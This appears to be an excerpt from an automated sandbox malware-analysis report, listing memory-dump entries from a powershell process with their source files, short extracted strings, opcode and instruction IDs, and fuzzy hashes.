                                    • Instruction Fuzzy Hash: EF714BF1B002069FDB24AF7E84046BAB7E6EFC4610F1488BAC945DB251EB39D945C7E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$x.{k$-{k
                                    • API String ID: 0-3515066249
                                    • Opcode ID: 08b0e7ccaa8c2500c12127285436facbbdf11ab5eb8e8deb5d125ca915bacad9
                                    • Instruction ID: 8b4417e634d650f6b0876e2b449bc06c709e87ddac6d3da719f5e01fa6f15453
                                    • Opcode Fuzzy Hash: 08b0e7ccaa8c2500c12127285436facbbdf11ab5eb8e8deb5d125ca915bacad9
                                    • Instruction Fuzzy Hash: DFC1A2F4A102059FEB24CF98C544BAEBBA3EF88704F14C469D5056F355CB3AE856CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$x.{k$-{k
                                    • API String ID: 0-3515066249
                                    • Opcode ID: 78056635843a4ecd34b074853021069a75849acfd8b46fb3b4668c0eb9b0cb27
                                    • Instruction ID: 4a66ed7761e17941622db3dac9b0f2102c3ba13a579af45cca60be61dfd490a0
                                    • Opcode Fuzzy Hash: 78056635843a4ecd34b074853021069a75849acfd8b46fb3b4668c0eb9b0cb27
                                    • Instruction Fuzzy Hash: 3DC1B3B4A102059FDB24CF98C544BAEBBB3EF88304F15C4A5D5056F355CB39E896CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$x.{k$-{k
                                    • API String ID: 0-1537318081
                                    • Opcode ID: 8931483ecdfc3e49fb02a99a3393304a9e2c74c872334fd61889b01124e3295c
                                    • Instruction ID: 93e64cb7e1a2096c86131e251cee2e52a87fff4b2efde16efcf16851e4ccdae7
                                    • Opcode Fuzzy Hash: 8931483ecdfc3e49fb02a99a3393304a9e2c74c872334fd61889b01124e3295c
                                    • Instruction Fuzzy Hash: F1526DB4B002149FEB20CB58C955F69BBB2EF85314F10C4D5EA099F391CA76ED86CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$x.{k$-{k
                                    • API String ID: 0-1537318081
                                    • Opcode ID: bb75791d7db9eb3f595505bbba7fa0e1b32d32ec73cc31dadf19c85bf99cee04
                                    • Instruction ID: b1bef10e7635a8d5034a2fcbeb18a6f8deb8cc3b751f68cebb40999af934d47c
                                    • Opcode Fuzzy Hash: bb75791d7db9eb3f595505bbba7fa0e1b32d32ec73cc31dadf19c85bf99cee04
                                    • Instruction Fuzzy Hash: D5425BB4A002149FEB20CB58C945FA9BBF2EF85314F14C4D9EA09AB351CB76ED85CB51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$x.{k$-{k
                                    • API String ID: 0-1537318081
                                    • Opcode ID: 01dbca068274373a04db925c21aba5717dea67f182c35daea011f37aa58c0636
                                    • Instruction ID: 0bb4ae1d55630b12dbb0423b8f04805fefc0fd405c4c42d7d39223f0bb511167
                                    • Opcode Fuzzy Hash: 01dbca068274373a04db925c21aba5717dea67f182c35daea011f37aa58c0636
                                    • Instruction Fuzzy Hash: 9C4275B47002149FD724DB58C991BAABBB2EF89314F1084E8D9095F751CB76ED82CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq$$]q$$]q
                                    • API String ID: 0-1533201563
                                    • Opcode ID: 24d7e1cb13981e2826b42104ed018cc5b72af0e3f0aaf2f1a997a84529b6d2da
                                    • Instruction ID: 7b97ef87656f35f96c94d9baac2a5d1af2caffd197a98536e86c566aa27b9bdd
                                    • Opcode Fuzzy Hash: 24d7e1cb13981e2826b42104ed018cc5b72af0e3f0aaf2f1a997a84529b6d2da
                                    • Instruction Fuzzy Hash: 21224234B002589FCB25EB24D8946AEB7F2BF89704F1440A9D80AAB351DB35DE85CF95
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$x.{k$-{k
                                    • API String ID: 0-1537318081
                                    • Opcode ID: 2b0042454956f2123dff507a737f15cf523503974e8f59e748262adfda1e3b63
                                    • Instruction ID: 7d99c310814a28455028bd7319f8b3f80d1b541139716be3c5ef6082ab6677b3
                                    • Opcode Fuzzy Hash: 2b0042454956f2123dff507a737f15cf523503974e8f59e748262adfda1e3b63
                                    • Instruction Fuzzy Hash: 9F227EB4A002149FE720CB58C955F69BBB2EF85314F1084D5EA09AF391CB76ED85CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$x.{k$-{k
                                    • API String ID: 0-1537318081
                                    • Opcode ID: 58023936f67f38c88103e89955000dc82a23c9df979a1d1600cda36b73dccce3
                                    • Instruction ID: 9c0a53c12703a2c7c66b1f812d66c91a237a4b1db504f54eda3f4e510bb8fc47
                                    • Opcode Fuzzy Hash: 58023936f67f38c88103e89955000dc82a23c9df979a1d1600cda36b73dccce3
                                    • Instruction Fuzzy Hash: 8C1273B47002149FD714DB58C990BAABBB2EB89314F1084E8E9095F791CB76ED82CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$x.{k
                                    • API String ID: 0-1521076892
                                    • Opcode ID: 76bb253e36685dcdbb47c777ea4676a2d11c4acfdbb0a66b64200280f6a58702
                                    • Instruction ID: 207a4dda103dab3aad88a24347931673b0479e5584ea2e53e21660c6fcdce14e
                                    • Opcode Fuzzy Hash: 76bb253e36685dcdbb47c777ea4676a2d11c4acfdbb0a66b64200280f6a58702
                                    • Instruction Fuzzy Hash: 35127EB4B00314DFEB60CB58C954BAABBB2FB89314F1085E8D6095B751CB36AD85CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$x.{k
                                    • API String ID: 0-1521076892
                                    • Opcode ID: 253c3b57ba4b622a493a3f88d0fe63ae6c99d7984d028b86c2f8801308bad4c7
                                    • Instruction ID: 48fda266218f9c47c4a565e868cadf00f963252ae95e1f0e9866bc56dd411640
                                    • Opcode Fuzzy Hash: 253c3b57ba4b622a493a3f88d0fe63ae6c99d7984d028b86c2f8801308bad4c7
                                    • Instruction Fuzzy Hash: 55E160B4B00314DFEB60CB58C954BAABBB2FB85314F1085E8D6096B751CB36AD85CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP]q$tP]q
                                    • API String ID: 0-145478062
                                    • Opcode ID: 70996d6e51b50a8e430b9dd52fb9a923675d45298c9ca7155f94d93f213d13b4
                                    • Instruction ID: 5524c56a0cee27c54d23012979f8ae30fa5210d36b8c6948e93ff7bf2a9ffcaf
                                    • Opcode Fuzzy Hash: 70996d6e51b50a8e430b9dd52fb9a923675d45298c9ca7155f94d93f213d13b4
                                    • Instruction Fuzzy Hash: A2517EF17003069FD7246A6AC808F66BBA5EFC1315F18C4FAE645CB251C779C844C3A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: L
                                    • API String ID: 0-2909332022
                                    • Opcode ID: 9a0f3634ff6fd372a00d96d2c257243f7df75934304e2f7c3aaa1e71a7d3818c
                                    • Instruction ID: e2bfddb98976d1b51f8c32bebf599b7f83d81acabab3f171743d344eb497ceef
                                    • Opcode Fuzzy Hash: 9a0f3634ff6fd372a00d96d2c257243f7df75934304e2f7c3aaa1e71a7d3818c
                                    • Instruction Fuzzy Hash: 9CC16C35A003489FCB14DFA4E584AADBBF6FF84310F118569E8069B365CB74AD89CB85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: x.{k
                                    • API String ID: 0-2880906344
                                    • Opcode ID: 5358dbc2bc0f8592458737ed4581f945b8b91f6f44a05f22f79b4d032fca6561
                                    • Instruction ID: 329908882a3be7d557b677003f0c79370ab7c7805a670c7df55270877318a708
                                    • Opcode Fuzzy Hash: 5358dbc2bc0f8592458737ed4581f945b8b91f6f44a05f22f79b4d032fca6561
                                    • Instruction Fuzzy Hash: 173107B4B10204AFE7109BA8CA55FAF7AA3DFC4704F108824E9016F791CE769D428BF1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a9943c7190e7a8e9975ed790df83129aca3ba3e60fb4462560b82535227da070
                                    • Instruction ID: df2f6f205086984ee561c9336df74417e11e5233b9148c18249a0ec56aec3c94
                                    • Opcode Fuzzy Hash: a9943c7190e7a8e9975ed790df83129aca3ba3e60fb4462560b82535227da070
                                    • Instruction Fuzzy Hash: 950260B4A00245DFEB20CB58C584FA9BBB2EF85304F14C5A9E6195B352CB76ED41CF90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e82983c49ebe29777905133976455097fc6aa4cb87996e0014b45bf668753db8
                                    • Instruction ID: 39acfc3e586f6819c343391604ad5f22e10a6e06a5f017cbfff4e2f0da243772
                                    • Opcode Fuzzy Hash: e82983c49ebe29777905133976455097fc6aa4cb87996e0014b45bf668753db8
                                    • Instruction Fuzzy Hash: 96C17FB4B00208EFEB14CB5CC695A69BBB2EF89314F14C4A5E9059F355CB72EC46CB91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e0622b0cf7e0c7d2c62a0aa664d0b9afe3ef2ad70d3456bd74b33c2cf816b997
                                    • Instruction ID: 3833d14a0d84d7ebef0e2620ca44ed098e03f5e3922fb38f271d1d6ebc240232
                                    • Opcode Fuzzy Hash: e0622b0cf7e0c7d2c62a0aa664d0b9afe3ef2ad70d3456bd74b33c2cf816b997
                                    • Instruction Fuzzy Hash: 74D13674E012099FCB05CFA8E594AADBBF2FF48310F248599E805AB365C731ED46CB95
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a92b2123a4bdb8af9c87dfd2171cc6fa8d1ba336ef7e2adc5d578a2119584ea4
                                    • Instruction ID: 07d364abbb117dc5b81ae3be12498ba0b1340fb8992c38f29c03538493538104
                                    • Opcode Fuzzy Hash: a92b2123a4bdb8af9c87dfd2171cc6fa8d1ba336ef7e2adc5d578a2119584ea4
                                    • Instruction Fuzzy Hash: 9FB14D70E042099FDB50CFA8E9857EEBFF6BF48304F148129DC15A7254EB749846CB9A
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e98f4bd64fee3508458b214d6c1b967b161006428a35ef8848e410f132baf3e
                                    • Instruction ID: 91b716827061cbbfbc769d17f4cc61622a8a548505959b002ee653729fffd5a2
                                    • Opcode Fuzzy Hash: 6e98f4bd64fee3508458b214d6c1b967b161006428a35ef8848e410f132baf3e
                                    • Instruction Fuzzy Hash: 40B16F70E0420ADFDB50CFA8E9857EDBBF2BF88314F148129D815E7254EB749845CB96
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7cb1c69e431fb397b5134f4ba9a6e1b709322ffc0d09be7afcf8214871cb7644
                                    • Instruction ID: af7b3f101cc757a5f1593d26cd4fd2ac0f14d3f5cb697977a9b21d90daff6d54
                                    • Opcode Fuzzy Hash: 7cb1c69e431fb397b5134f4ba9a6e1b709322ffc0d09be7afcf8214871cb7644
                                    • Instruction Fuzzy Hash: 72918974A0060A9FCB05CF59D5D49BEFBB1FF88310B24859AD905AB365C732EC81CBA5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a408c108114942885149941f74bbcdd644d89d743ead6d7659fab226581fc0bd
                                    • Instruction ID: 4119a3281eca2cbc43fb357338c3364251d4f09a9f2691cb97df00650b15e445
                                    • Opcode Fuzzy Hash: a408c108114942885149941f74bbcdd644d89d743ead6d7659fab226581fc0bd
                                    • Instruction Fuzzy Hash: 2071B270A002088FCB18DF68D480AAEBBF6FF89314F14856AD415DB765DB75EC46CB85
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3fab2383f7489bf377852136a3534677933e7b31b97ffc51e80d53805134d6a
                                    • Instruction ID: d3930b0b2920d9405ab4e25090dcadef7905ca225a0c00d7a5eb0b05bd0eff1a
                                    • Opcode Fuzzy Hash: d3fab2383f7489bf377852136a3534677933e7b31b97ffc51e80d53805134d6a
                                    • Instruction Fuzzy Hash: 57717E74E002089FDB18DFA5D580BADBBF6FF88304F148429D812AB7A4DB34AD46CB51
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d606b7dbb9b49cbfe69b2bd0406be84530d6d8277b7e43b73025793eed63987d
                                    • Instruction ID: 8e56a0af82c1f02a6dcffb19cc73c3ec79b8970efaafde9fd1036c770cc63c25
                                    • Opcode Fuzzy Hash: d606b7dbb9b49cbfe69b2bd0406be84530d6d8277b7e43b73025793eed63987d
                                    • Instruction Fuzzy Hash: 91717C70E0420ADFDF50CFA9D8457EEBBF2BF88314F148129D805AB254DB749842CB96
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 851e7118ae526b6c10d938385999357dff8628850a12e411fbde6bf1c8de930f
                                    • Instruction ID: a1190c237f62f65f062d20fe6b3a739953ed3374e8c17cfd34aac6e3a7385efa
                                    • Opcode Fuzzy Hash: 851e7118ae526b6c10d938385999357dff8628850a12e411fbde6bf1c8de930f
                                    • Instruction Fuzzy Hash: 33714A70E0420ADFDB50DFA8D8457DDBBF2BF88714F148129D815AB254DB749842CFA6
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4407c0f2f697c4f4e1f4fb6e8ef4f5a1d5867b97e098ed0a928fd2a1881b991f
                                    • Instruction ID: 29827bb1651db97fea812f81bf32bdd17008ce92fa9ab4d755d77d32efc8f64e
                                    • Opcode Fuzzy Hash: 4407c0f2f697c4f4e1f4fb6e8ef4f5a1d5867b97e098ed0a928fd2a1881b991f
                                    • Instruction Fuzzy Hash: 5541ABF17001518BDB3567B85515AABBBD2CFD2318B148CEADA018F356DE3A8806C3E2
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d438d54983f3b5dfc89a92375778ffccd736212abe58426e57546ebbbf59bed
                                    • Instruction ID: 853fad3edc2286d399ec2021261294de0573cb005926c0bf69b7cd90825b4f44
                                    • Opcode Fuzzy Hash: 1d438d54983f3b5dfc89a92375778ffccd736212abe58426e57546ebbbf59bed
                                    • Instruction Fuzzy Hash: 17416D30A002048FDB18EB64D594AAE7BF6FF88755F044468E906EB7A4DF34AD41CB91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9427504887e16e2128c5b0e3e1fa1f38a24c01e2e496816127f33edb24e3ab09
                                    • Instruction ID: 733eb6876682c62c779f0568765031ef401a163e321105dd9d562293f4b1bc47
                                    • Opcode Fuzzy Hash: 9427504887e16e2128c5b0e3e1fa1f38a24c01e2e496816127f33edb24e3ab09
                                    • Instruction Fuzzy Hash: 9B418F70A002089FDB18DFA5D584BAEBBF6FF88344F148429D406AB7A4DB74AC45CB81
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c7e0e232a077c97f770e9162f000e6de38304f4a0e5c68f37750678d85ba0f3b
                                    • Instruction ID: af02ca01423a0ba9de92ae99870212912f2511fae2ae3d70b9505e0949627625
                                    • Opcode Fuzzy Hash: c7e0e232a077c97f770e9162f000e6de38304f4a0e5c68f37750678d85ba0f3b
                                    • Instruction Fuzzy Hash: D3412874A0050A9FCB05CF59D1949BEFBB1FF48310B118159D905AB365C732FC91CBA9
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1efd1c3bc6f5d1c7f902c706528afec2e486281fdccb298c83fee0c4ef373cd0
                                    • Instruction ID: 99443242f0f02bbb32339f6da93e7a0738b41687e986dea44eaf34aaacb22198
                                    • Opcode Fuzzy Hash: 1efd1c3bc6f5d1c7f902c706528afec2e486281fdccb298c83fee0c4ef373cd0
                                    • Instruction Fuzzy Hash: 09217CF5B0032AABE724266F8948B3777D9EBC5701F14887AE645CB3C1CE79C8418360
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8deb4eee38ca909d6d414e88e06ab1943e0d63e9fd3b97cc4077d1796b129f6b
                                    • Instruction ID: c970c96297a1ebe84a09e6edade1913935ab645f1f74982ee410874bc308cf17
                                    • Opcode Fuzzy Hash: 8deb4eee38ca909d6d414e88e06ab1943e0d63e9fd3b97cc4077d1796b129f6b
                                    • Instruction Fuzzy Hash: 77313D34B012188FCB25EB64D8956EEB7F2BF49304F1040E9D90AAB351CB359E85CF95
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 10fe97d7c16e75298bc2775d9ea02a8e9c64c84f6a2b56c690b16ef9a99a8450
                                    • Instruction ID: decf43f150bf274b10e2af070a2eacbafcb04458329602c2d3430bd68ca846da
                                    • Opcode Fuzzy Hash: 10fe97d7c16e75298bc2775d9ea02a8e9c64c84f6a2b56c690b16ef9a99a8450
                                    • Instruction Fuzzy Hash: C921E1F5B0031AABE7242A6B4948B7277D5EF95700F1488A2E644CB3D1CB7DCC408371
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3214b2d2f94bf8143e3915ad3090a1c79fd2b83604bc7667cacfa9793d06e715
                                    • Instruction ID: 316c26e30aebad7dcd585d1d400c4bfdff2598b4dc7fc26a854e554463bbbd99
                                    • Opcode Fuzzy Hash: 3214b2d2f94bf8143e3915ad3090a1c79fd2b83604bc7667cacfa9793d06e715
                                    • Instruction Fuzzy Hash: FA210874A042499FCB00DF98D5909AEBBB5FF89310B1584A9D849AB352C735E941CBA1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3160800095.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d4398370f12e0ad1411d7f718911c1cd07bb11868d1f5c12d3c3d6c21d750bac
                                    • Instruction ID: 67d6c81cdcd17c6224396d2c9420f9770be425c6fb6d9114687c38f7d556b8ed
                                    • Opcode Fuzzy Hash: d4398370f12e0ad1411d7f718911c1cd07bb11868d1f5c12d3c3d6c21d750bac
                                    • Instruction Fuzzy Hash: B3117F30D04159CBDFA4DA94E99C7ECBBF6BB45219F18142ADC02B6190EB7458CACB1F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 312f1d2b89411e3d3950e3fa270c3a6a1ee3458277f3ac70f1dbcba13061ffed
                                    • Instruction ID: 06f4f938576c3f4994faa3d5cf0782083e74df0e114134657a5fd318e0c72afc
                                    • Opcode Fuzzy Hash: 312f1d2b89411e3d3950e3fa270c3a6a1ee3458277f3ac70f1dbcba13061ffed
                                    • Instruction Fuzzy Hash: 9FB012711091404FC202CB10CC61440BBA0DF92204328C0CAD4048B253CB23DE03C781
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-1742154110
                                    • Opcode ID: db9114a303997684314c354e1b7c98ff3e2e08f37ed6522206eb53ad9704bad5
                                    • Instruction ID: 74046987e718d149e311726531f7388fd53642ac3db35323e3282cc06ddd932b
                                    • Opcode Fuzzy Hash: db9114a303997684314c354e1b7c98ff3e2e08f37ed6522206eb53ad9704bad5
                                    • Instruction Fuzzy Hash: 9DF148F1B0420ADFEF248F68D44C6AAB7E6EFC5310F14C4AADA558B255DB39C841CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$XRbq$XRbq$XRbq$tP]q$tP]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q
                                    • API String ID: 0-1562111438
                                    • Opcode ID: e1fee07999af79739ae7363417c7cb3b02d2f80701eb0d8c1ecd0b92bee8b9e6
                                    • Instruction ID: 2f8d6bb0ea1d1be02d3f966b1131b2bd8b9175dfe87b4d71e81db3eebeb64eed
                                    • Opcode Fuzzy Hash: e1fee07999af79739ae7363417c7cb3b02d2f80701eb0d8c1ecd0b92bee8b9e6
                                    • Instruction Fuzzy Hash: BF023AF1B00206DFEB248F68E548A7A77E7FF85310F1484A5EA059B295CB39DD41CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3165420179.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7b60000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4']q$4']q$4']q$4']q$_$d5zk$tP]q$tP]q$zeiS$$]q$$]q$$]q$$]q
                                    • API String ID: 0-586795138
